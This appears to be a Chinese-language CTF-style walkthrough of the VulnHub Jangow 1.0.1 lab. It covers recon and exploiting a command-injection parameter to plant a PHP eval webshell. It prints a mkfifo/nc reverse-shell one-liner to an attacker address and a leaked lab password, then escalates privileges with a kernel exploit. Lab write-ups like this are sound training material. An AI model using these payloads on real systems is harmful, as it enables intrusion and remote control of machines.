VulnHub_Jangow: 1.0.1

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关

主机信息

kali:192.168.31.9
BreakOut:192.168.31.227

信息收集

使用nmap探测目标主机端口2个端口,一个FTP,一个http
1e8c9be8014ec3ccf86391af7f29316b.png
80端口网站打开是一个目录
d7ea4bc7d8a9474a6aef298091e6f281.png
打开site后是一个网站
a9f0784ab22a4f43c5547b2fffbdf9b6.png
简单查看后发现Buscar可以到跳转到其他页面,并且可接收参数
3a99a5805cda2c660ef7474cedf99322.png

GETSHELL

经过测试这个接口可以执行命令
b2d29336afdc8ce72d93936096f4b466.png
查看页面源码发现使用buscar接收参数后使用system函数进行执行命令
777669258745ab20bf124549ffbbc9f2.png
尝试反弹shell没有成功,然后查看用户目录下有一个user.txt
ef566b00666110942e96ab335b8d5487.png
访问后得到第一个flag
76abf6e1db938c90ad4a60a53b17f271.png
在网站目录下查看wordpress目录,发现一个config.php
0d88b5cf563f66bf0e83666a71ec8fd9.png
查看配置文件拿到数据库用户名和密码,通过代码判断应该是MySQL的数据库
589a7035f87b7a79cb17dd727d58e516.png

$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";

使用获取到的用户名和密码尝试登录失败
f07ba49866157274beebfad5a9842d05.png
然后尝试使用系统的用户和配置文件的密码组合发现登录成功,但是无法通过FTP获取更多信息
c9f04052a8cf8b59a2ede15749232d67.png
尝试使用命令执行写入shell

http://192.168.31.227/site/busque.php?buscar=echo '<?php @eval($_POST['x']); ?>' >> shell.php

45b05ea0b017d6052323e77913b90899.png
检查看到shell写入成功
4f5152e7a416e41bd5eea2d66c8ec852.png
测试链接成功
5f60534113331b3d9e33cb4c67dcf411.png
8c8bf778ce529e4d3f465d53d24ab744.png
查看系统版本和内核信息
f7277088b83e8cf5692409a658e22a08.png
查看.backup文件,发现存在用户名密码
b6443005491605acb6723de04c19e1d0.png
反弹shell
使用蚁剑创建文件x.php,将以下内容写入文件,在kali上监听443端口,然后访问该文件

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.239 443 >/tmp/f");?>

3e4f8dcce6c5263269c2d82ed71abf12.png
然后使用python获取一个ttyshell

python3 -c 'import pty;pty.spawn("/bin/bash")'

e3bcb87534aafa1f01197c330608d7be.png
然后我们们用之前获取的用户名密码切换到jangow01用户
f433954e858b579c67d2338b8a6b2ac1.png

提权

通过上面获取的内核版本信息,使用searchspolit查询发现有可用的提权POC
76702ae90b9b333a2ce7fe1b87ec111a.png
然后将POC下载到本地
ccb8605f9e8dc43f92147d454cfbe16c.png
将POC进行编译
9e87e3f7adba1c6615a8c93ab5a807d3.png
通过尝试最终在jangow01用户的家目录下上传了exp
d53db4a763f2fb4b91d00375277c5c3d.png
在赋权执行时发现执行失败
71a4248b8d0e587aba728fdd26341415.png
然后尝试使用ssh进行本地连接
eaf2a2074dde9b79d4c31bb705e0acb5.png
使用ssh连接后发现仍无法执行,最终确定因为编译机器kali为ARM架构,靶机为x86所以会导致执行失败,然后将POC上传到靶机进行编译后成功提权
2927d536867160fbb7629b6f1813ea34.png
查看最后一个Flag
6b728c04e7094b59fe27ab67ea99613f.png

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值